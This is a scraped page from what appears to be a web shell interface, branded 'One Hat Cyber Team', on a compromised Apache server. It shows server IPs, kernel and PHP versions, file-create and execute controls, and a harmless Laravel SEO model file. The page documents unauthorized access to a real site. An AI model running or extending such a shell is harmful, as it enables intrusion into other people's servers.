⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.162
Server IP:
147.93.29.146
Server:
Linux server.tagooz.co 5.14.0-503.15.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Nov 28 07:25:19 EST 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
webstoremaker
/
public_html
/
app
/
Models
/
View File Name :
Seo.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Seo extends Model { use HasFactory; public $timestamps = false; protected $fillable = ['language_id', 'home_meta_keywords', 'home_meta_description', 'profiles_meta_keywords', 'profiles_meta_description', 'pricing_meta_keywords', 'pricing_meta_description', 'blogs_meta_keywords', 'blogs_meta_description', 'faqs_meta_keywords', 'faqs_meta_description', 'contact_meta_keywords', 'contact_meta_description', 'login_meta_keywords', 'login_meta_description', 'forget_password_meta_keywords', 'forget_password_meta_description', 'checkout_meta_keywords', 'checkout_meta_description', 'vcard_template_description', 'vcard_template_keywords', 'website_template_description', 'website_template_keywords']; }